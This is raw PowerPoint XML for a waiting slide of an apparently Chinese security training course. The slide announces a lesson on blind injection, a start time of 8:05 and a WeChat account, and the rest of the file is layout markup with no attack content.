            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832" y="1776"/>
              <a:ext cx="96" cy="96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88" name="Rectangle 186"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832" y="1920"/>
              <a:ext cx="96" cy="96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89" name="Rectangle 187"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832" y="2064"/>
              <a:ext cx="96" cy="96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90" name="Rectangle 188"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832" y="2208"/>
              <a:ext cx="96" cy="96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91" name="Rectangle 189"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2976" y="1920"/>
              <a:ext cx="96" cy="96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92" name="Rectangle 190"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2976" y="2208"/>
              <a:ext cx="96" cy="96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93" name="Rectangle 191"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120" y="1776"/>
              <a:ext cx="96" cy="96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94" name="Rectangle 192"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120" y="1920"/>
              <a:ext cx="96" cy="96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95" name="Rectangle 193"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120" y="2064"/>
              <a:ext cx="96" cy="96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96" name="Rectangle 194"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3264" y="1776"/>
              <a:ext cx="96" cy="96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97" name="Rectangle 195"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3264" y="2064"/>
              <a:ext cx="96" cy="96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98" name="Rectangle 196"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408" y="1632"/>
              <a:ext cx="96" cy="96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99" name="Rectangle 197"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408" y="1776"/>
              <a:ext cx="96" cy="96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100" name="Rectangle 198"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408" y="1920"/>
              <a:ext cx="96" cy="96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101" name="Rectangle 199"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408" y="2064"/>
              <a:ext cx="96" cy="96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102" name="Rectangle 200"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3552" y="1632"/>
              <a:ext cx="96" cy="96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103" name="Rectangle 201"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3552" y="1920"/>
              <a:ext cx="96" cy="96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104" name="Rectangle 202"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3696" y="1776"/>
              <a:ext cx="96" cy="96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105" name="Rectangle 203"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3696" y="1920"/>
              <a:ext cx="96" cy="96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106" name="Rectangle 204"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3696" y="2064"/>
              <a:ext cx="96" cy="96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107" name="Rectangle 205"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2256" y="2064"/>
              <a:ext cx="96" cy="96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108" name="Rectangle 206"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2112" y="2064"/>
              <a:ext cx="96" cy="96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</p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="AutoShape 207"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="711270" y="2655888"/>
            <a:ext cx="10262610" cy="8382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110" name="Rectangle 208"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2743470" y="4256088"/>
            <a:ext cx="711270" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FFFFFF">
                <a:alpha val="50195"/>
              </a:srgb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111" name="Rectangle 209"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2337030" y="4789488"/>
            <a:ext cx="304830" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FFFFFF">
                <a:alpha val="50195"/>
              </a:srgb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112" name="Rectangle 210"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2032200" y="4941888"/>
            <a:ext cx="406440" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FFFFFF">
                <a:alpha val="50195"/>
              </a:srgb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2540" y="2732088"/>
            <a:ext cx="8840070" cy="685800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59570" y="3494088"/>
            <a:ext cx="7519140" cy="3810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pic>
        <p:nvPicPr>
          <p:cNvPr id="118" name="图片 117" descr="掌控者LOGO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8865" y="1437005"/>
            <a:ext cx="3223895" cy="12636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28449" y="355600"/>
            <a:ext cx="8685538" cy="4873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0E65E-9137-4309-8D78-B392A1917D52}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="118" name="图片 117" descr="掌控者LOGO"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect r="74718" b="16204"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="558800" y="163830"/>
            <a:ext cx="669925" cy="87122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8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="10681752" y="0"/>
            <a:ext cx="1511449" cy="10445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1027" name="Rectangle 119"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="10679636" cy="10445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ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1028" name="Group 120"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="9170303" y="152400"/>
            <a:ext cx="2540250" cy="762000"/>
            <a:chOff x="2112" y="1632"/>
            <a:chExt cx="1680" cy="672"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1037" name="Rectangle 121"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2400" y="1776"/>
              <a:ext cx="95" cy="95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1038" name="Rectangle 122"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2400" y="2065"/>
              <a:ext cx="95" cy="95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1039" name="Rectangle 123"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2400" y="2207"/>
              <a:ext cx="95" cy="97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1040" name="Rectangle 124"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2545" y="1776"/>
              <a:ext cx="95" cy="95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1041" name="Rectangle 125"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2545" y="1920"/>
              <a:ext cx="95" cy="95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1042" name="Rectangle 126"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2545" y="2065"/>
              <a:ext cx="95" cy="95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1043" name="Rectangle 127"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2687" y="1776"/>
              <a:ext cx="97" cy="95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1044" name="Rectangle 128"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2687" y="2065"/>
              <a:ext cx="97" cy="95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1045" name="Rectangle 129"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2687" y="2207"/>
              <a:ext cx="97" cy="97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1046" name="Rectangle 130"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832" y="1776"/>
              <a:ext cx="98" cy="95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1047" name="Rectangle 131"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832" y="1920"/>
              <a:ext cx="98" cy="95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1048" name="Rectangle 132"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832" y="2065"/>
              <a:ext cx="98" cy="95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1049" name="Rectangle 133"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832" y="2207"/>
              <a:ext cx="98" cy="97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1050" name="Rectangle 134"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2976" y="1920"/>
              <a:ext cx="97" cy="95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1051" name="Rectangle 135"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2976" y="2207"/>
              <a:ext cx="97" cy="97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1052" name="Rectangle 136"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120" y="1776"/>
              <a:ext cx="97" cy="95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1053" name="Rectangle 137"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120" y="1920"/>
              <a:ext cx="97" cy="95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1054" name="Rectangle 138"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120" y="2065"/>
              <a:ext cx="97" cy="95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1055" name="Rectangle 139"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3264" y="1776"/>
              <a:ext cx="95" cy="95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1056" name="Rectangle 140"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3264" y="2065"/>
              <a:ext cx="95" cy="95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1057" name="Rectangle 141"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408" y="1632"/>
              <a:ext cx="95" cy="97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1058" name="Rectangle 142"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408" y="1776"/>
              <a:ext cx="95" cy="95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1059" name="Rectangle 143"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408" y="1920"/>
              <a:ext cx="95" cy="95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1060" name="Rectangle 144"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408" y="2065"/>
              <a:ext cx="95" cy="95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1061" name="Rectangle 145"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3553" y="1632"/>
              <a:ext cx="95" cy="97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1062" name="Rectangle 146"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3553" y="1920"/>
              <a:ext cx="95" cy="95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1063" name="Rectangle 147"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3695" y="1776"/>
              <a:ext cx="97" cy="95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1064" name="Rectangle 148"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3695" y="1920"/>
              <a:ext cx="97" cy="95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1065" name="Rectangle 149"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3695" y="2065"/>
              <a:ext cx="97" cy="95"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF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1066" name="Rectangle 150"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2256" y="2065"/>
              <a:ext cx="95" cy="95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1067" name="Rectangle 151"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2112" y="2065"/>
              <a:ext cx="97" cy="95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</p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1029" name="Rectangle 152"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="8738460" y="76200"/>
            <a:ext cx="304830" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FFFFFF">
                <a:alpha val="50195"/>
              </a:srgb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1030" name="Rectangle 153"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="8941680" y="228600"/>
            <a:ext cx="304830" cy="152400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FFFFFF">
                <a:alpha val="50195"/>
              </a:srgb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1031" name="Rectangle 154"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="9144900" y="304800"/>
            <a:ext cx="406440" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FFFFFF">
                <a:alpha val="50195"/>
              </a:srgb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711270" y="1295400"/>
            <a:ext cx="1092307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5588550" y="6505575"/>
            <a:ext cx="1117710" cy="2619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0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DCFB4DC4-41B9-4E61-AD6F-4DDEA2B45915}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103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500864" y="262255"/>
            <a:ext cx="8685538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黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
          <a:ea typeface="黑体" panose="020106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黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
          <a:ea typeface="黑体" panose="020106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黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
          <a:ea typeface="黑体" panose="020106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黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
          <a:ea typeface="黑体" panose="020106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黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
          <a:ea typeface="黑体" panose="020106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黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
          <a:ea typeface="黑体" panose="020106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黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
          <a:ea typeface="黑体" panose="020106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黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
          <a:ea typeface="黑体" panose="020106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99FF"/>
        </a:buClr>
        <a:buFont typeface="Wingdings" panose="05000000000000000000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anose="05000000000000000000" pitchFamily="2" charset="2"/>
        <a:buChar char="§"/>
        <a:defRPr sz="2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1129272" y="302586"/>
            <a:ext cx="8684634" cy="487313"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>等待开课</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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73017" y="987039"/>
            <a:ext cx="10869433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200" dirty="0">
                <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              </a:rPr>
              <a:t>第二节：盲注</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0">
              <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0">
              <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
              <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              <a:ea typeface="方正正粗黑简体" panose="020000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9376" y="1587055"/>
            <a:ext cx="825287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500" dirty="0">
                <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              </a:rPr>
              <a:t>等待其他同学入场（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" dirty="0">
                <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              </a:rPr>
              <a:t>8:00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500" dirty="0">
                <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" dirty="0">
                <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              </a:rPr>
              <a:t>8.05</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500" dirty="0">
                <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              </a:rPr>
              <a:t>）   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" dirty="0">
                <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              </a:rPr>
              <a:t>8.05</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500" dirty="0">
                <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              </a:rPr>
              <a:t>准时开讲！</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2500" dirty="0">
              <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2500" dirty="0">
              <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              <a:ea typeface="方正正粗黑简体" panose="020000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11480" y="5887687"/>
            <a:ext cx="4272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方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              </a:rPr>
              <a:t>微</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              </a:rPr>
              <a:t>信公众号：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              </a:rPr>
              <a:t>掌控安全</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
